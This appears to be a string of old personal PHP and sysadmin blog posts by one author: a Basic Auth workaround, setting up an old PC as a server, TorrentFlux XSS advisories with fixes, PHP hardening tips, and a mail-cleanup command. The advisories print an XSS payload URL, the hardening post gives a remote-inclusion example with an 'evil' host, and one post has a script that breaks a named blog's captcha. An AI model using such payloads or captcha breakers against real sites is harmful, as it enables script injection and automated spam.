While developing a project using two factor authentication, with a key fob, I needed to use HTTP Basic Authentication over SSL, to prevent XSS as the project was a web based proxy. Now I had PHP5 running as a module, but PHP4 as CGI. There was the problem HTTP Authentication isn’t available under PHP running as CGI.

First you need to configure mod_rewrite:

.htaccess:

RewriteEngine on
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]

What that will do is feed the base64′d user:pass into an environment variable named HTTP_AUTHORIZATION.

Then just add this above your script:

list($_SERVER['PHP_AUTH_USER'], $_SERVER['PHP_AUTH_PW']) = explode(’:’ , base64_decode(substr($_SERVER['HTTP_AUTHORIZATION'], 6)));

That splits up the username and password, and makes it look as if you were running PHP as a module.
So for a sample script:

// split the user/pass parts
list($_SERVER['PHP_AUTH_USER'], $_SERVER['PHP_AUTH_PW']) = explode(’:', base64_decode(substr($_SERVER['HTTP_AUTHORIZATION'], 6)));

// open a user/pass prompt
if (!isset($_SERVER['PHP_AUTH_USER'])) {
header(’WWW-Authenticate: Basic realm=”My Realm”‘);
header(’HTTP/1.0 401 Unauthorized’);
echo ‘Text to send if user hits Cancel button’;
exit;
} else {
echo ‘Hello, ‘.htmlentities($_SERVER['PHP_AUTH_USER']).’

‘;
echo ‘You entered as your password: ‘.htmlentities($_SERVER['PHP_AUTH_PW']).’

‘;
}
?>

Steven

This is the easiest part:

Windows:

Install Peer Guardian and utorrent

Download your hopefully legal content!

Linux:

Download: XAMPP

Install, this is a very easy installation!

Enjoy your webserver/filesever!

Regards,

Steven Roddis

Ok, you have an old computer that you will never use as your main pc, however you would either:

• Like to share files around the home.
• Use it to illegally legally download music/movies/tv shows overnight. (To help save your peak dl’s)
• Turn it into a webserver
• Your introduction to another OS eg. linux.
• Something else deconstructive. (Like world domination making peace)

So let’s start with the OS (Operating System):

Windows or Linux?

If you want to run do file sharing or a webserver: Linux

Downloading Stuff: Windows

Hang on a sec, Windows??? on an old PC. Oh.. yeah we can use something like 98?
No… Windows XP pro on an old pc, it can be done!
My choice of Windows was because Peer Guardian and utorrent run on it. (For “borrowing” music, games, tv shows. (You name it)

Installing the OS:

• Windows:

Get a copy of windows 98+ (utorrent works on 95 but PG doesn’t and our next program doesn’t support NT or 95 either)

Installing windows is easy, with XP you just pop in the disc, and follow the steps.

Or you could look at some of these guides if you are really stuck:

• http://www.windowsreinstall.com/
• http://www.theeldergeek.com/clean_installation_of_windows_xp.htm
• http://www.winsupersite.com/showcase/windowsxp_sg_clean.asp
• http://windows.radified.com/

Note for this example I am using Windows XP Pro :

So what is all this fuss about putting windows [running fast] on an old pc?

The Software from LitePC makes it possible. Get the version for your OS.

Yes, you could get it illegally, but they do a dam good job, so I would pay for it. (There is a FREE version)

If you need help, again you can drop me a line, or look at the knowledge base.

Now you have a fast windows based pc, and you are ready for the next step. :)

• Linux:

Step 1: Find a Linux Distro…

I love easy to install, easy to use, (and fast) ubuntu would be your best bet.

How can I get ubuntu?

Download and Burn it:

http://www.ubuntu.com/download

Get it shipped to your FREE:

https://shipit.ubuntu.com

How do I install it?

• A very easy install, make sure you BIOS is set to boot off CD, then pop the cd in. when it says boot: on the screen, and an ubuntu logo appears, type server. And the install starts. Just follow the easy prompts, and when it asks you to erase the disc select the option that is automatically selected. It is a very simple task! :)

Configure Remote Access:

Linux (Ubuntu):

First we need to enable the root user:

So login and type:

sudo passwd root
su

(You now use that account so type exit to logout and then log back in again as root.)

Type:

apt-get update
apt-get install ssh openssh-server

Beautiful!!!

Now to access we need a SSH Client.

Windows:

Putty (You just need Putty)

Mac OS:

MacSSH

If you are using Linux (as a client) you can install ssh (In ubuntu: apt-get install ssh)

Putty is very easy to use: ie. just type in the IP Address of the computer, and all good.

How to find the IP Address:

ifconfig (it is ipconfig for windows)

Will tell you all that you need to know! :)
Windows:

You have two choices here if you are using XP Pro or 2000:

Remote Desktop (RDP)

Or VNC

My Favourite VNC Server: TightVNC (Did I mention the price?? Free!)

If you don’t have either XP Pro or 2000 then you will have to use VNC.

Part two is coming soon!

TITLE:
TorrentFlux “action” Script Insertion

CRITICAL:
Not Critical
IMPACT:
Cross Site Scripting

WHERE:
From remote

SOFTWARE:
TorrentFlux 2.x

DESCRIPTION:
I have discovered a vulnerability in TorrentFlux, which can be exploited by malicious users to conduct script insertion attacks.

Input passed to the “action” variable is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which will be executed in an administrator’s browser session in context of an affected site when the “Activity Log” is viewed.

The vulnerability has been confirmed in version 2.1. Other versions may also be affected.

SOLUTION:
Edit the source code to ensure that input is properly sanitised.
/admin.php
Line 336:

$output .= “<td><div class=\”tiny\”>”.htmlentities($action, ENT_QUOTES).”</div></td>”;

Line 398:

echo “<option value=\”".htmlentities($action, ENT_QUOTES).”\” “.$selected.”>”.htmlentities($action, ENT_QUOTES).”</option>”;

TITLE:
TorrentFlux “file” Script Insertion

CRITICAL:
Moderate

IMPACT:
Cross Site Scripting

WHERE:
From remote

SOFTWARE:
TorrentFlux 2.x

DESCRIPTION:
I have discovered a vulnerability in TorrentFlux, which can be exploited by malicious users to conduct script insertion attacks.

Input passed to the “file” variable is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which will be executed in an administrator’s browser session in context of an affected site when the “Activity Log” is viewed. An example is attempting to login with an incorrect username or password. Where the username field of /login.php contains the arbitrary code.

The vulnerability has been confirmed in version 2.1. Other versions may also be affected.

SOLUTION:

Edit the source code to ensure that input is properly sanitised.

/admin.php

Line 338:

$output .= htmlentities($file, ENT_QUOTES);

TITLE:
TorrentFlux “user_id” Script Insertion

CRITICAL:
Not Critical
IMPACT:
Cross Site Scripting

WHERE:
From remote

SOFTWARE:
TorrentFlux 2.x

DESCRIPTION:
I have discovered a vulnerability in TorrentFlux, which can be exploited by malicious users to conduct script insertion attacks.

Data passed to the “users” array is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which will be executed in an administrator’s browser session in context of an affected site when the “Activity Log” is viewed.

The vulnerability has been confirmed in version 2.1. Other versions may also be affected.

SOLUTION:

Edit the source code to ensure that input is properly sanitised.

/admin.php

Line 416:

echo “”.htmlentities($users[$inx], ENT_QUOTES).”";

TITLE:
TorrentFlux “startpop.php” “torrent” Script Insertion
CRITICAL:
Not Critical

IMPACT:
Cross Site Scripting

WHERE:
From remote

SOFTWARE:
TorrentFlux 2.x

DESCRIPTION:
I have discovered a vulnerability in TorrentFlux, which can be exploited by malicious users to conduct script insertion attacks.

Input passed to the “torrent” field of a GET Request (/startpop.php?torrent=%22%3E%3Cscript%3Ealert(document.cookies);%3C/script%3E.torrent) is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which will be executed in an user’s browser session in context of an affected site if a user clicks on a malicious link.

The vulnerability has been confirmed in version 2.1. Other versions may also be affected.

SOLUTION:
Edit the source code to ensure that input is properly sanitised.

/startpop.php

Line 36: Change to: $displayName = htmlentities($displayName, ENT_QUOTES);

(Line 36 is normally empty)

Grant only trusted users access to the application

Today, I still don’t remember how I got to this blog post but anyway I saw that they had a text based captcha.

The blog author claims that it prevents spam, which it does! Because it added an extra layer of uniqueness to his code and unintelligent spam bots don’t realise. Anyway now for the breaking:

//Break Text Based Captcha:
$regex = ‘#/>\s+

\s+
$page = getpage(’http://pooteeweet.org/blog/259/p/1′);

preg_match($regex, $page, $matches);
$n1 = intval($matches[1]);
$n2 = intval($matches[3]);

$op = $matches[2];

switch ($op) {
case ‘+’:
$INTresult = intval($n1+$n2);
break;

case ‘-’:
$INTresult = intval($n1-$n2);
break;

case ‘/’:
$INTresult = intval($n1/$n2);
break;

case ‘*’:
$INTresult = intval($n1*$n2);
break;

default:
die(’Illegal Operation’);
break;
}

echo $INTresult;
?>

Note that my framework has a function getpage which is just a simple (well quite advanced actually…) curl function.

There you have it $INTresult is the answer to the math problem.

Yes this is a very simple text captcha but breaking a more advanced one wouldn’t require that much more effort.

Regards,

Steven Roddis

I get a lot of questions regarding how to increase security in their PHP App.

Aside from the obvious, write secure code; there are two easy “switches that you can flick”.

Disable: URL fopen wrappers

This will prevent most exploitations of the classic File Inclusion Vulnerability.

eg. include($foo.’bar.php’);

Now if $foo is set to ‘http://www.stevenroddis.com/evil?’

The script grabs PHP code from “http://www.stevenroddis.com/evil?bar.php”

But if URL fopen wrappers if off, then the hacker can only use files on your server. (Still with limitations such as the appending string)

However there is a downside to this some applications may use url wrappers to download data off the web, you can work around it by using curl, but you might not want to.

How?

php.ini (most people won’t have access to this)

allow_url_fopen off

.htaccess

php_flag allow_url_fopen off

Turn Off: Register Globals

Yes, it is off by default but the number of sites that get hacked due to it being on is astounding. Register Globals is not needed in 99.99% of PHP apps.

How?

php.ini (most people won’t have access to this)

register_globals off

.htaccess

php_flag register_globals off

#3 Bonus: Turn off Error Reporting

A lot of sites show sensitive information can make it easier to find a security hold and/or exploit it.

How?

php.ini (most people won’t have access to this)

display_errors Off

.htaccess

php_flag display_errors Off

Enforce these in your web app:

Don’t let stupid configuration changes bring down your defences, inside your php application make sure you die() and give some [nice] error, when say register globals is turned back on.

Code:

if (@ini_get(’register_globals’))
{
die();
}

You might want to do it also for allow_url_fopen (replace “register_globals” in the above with “allow_url_fopen”).

There you have it two (well four) easy and simple steps to greatly increase security in your PHP application. (Three of them don’t require changing your code)

Regards,

Steven Roddis

After forgetting to add “2>&1″ to the end of my cron job that runs every minute I ended up with a lot of “mail” in my Maildir, about 600,000! So I thought that I could do a simple “rm 11*” (Each file started with a 11)

But I ran into a problem: “Argument list too long.”

So after researching this problem I found out why (It has to do with not being able to fit the supplied argument list and environment into the 128K buffer)

I also found a solution: find . -name ‘11*’ | xargs rm

Three minutes later my Maildir was clear!

Regards,

Steven Roddis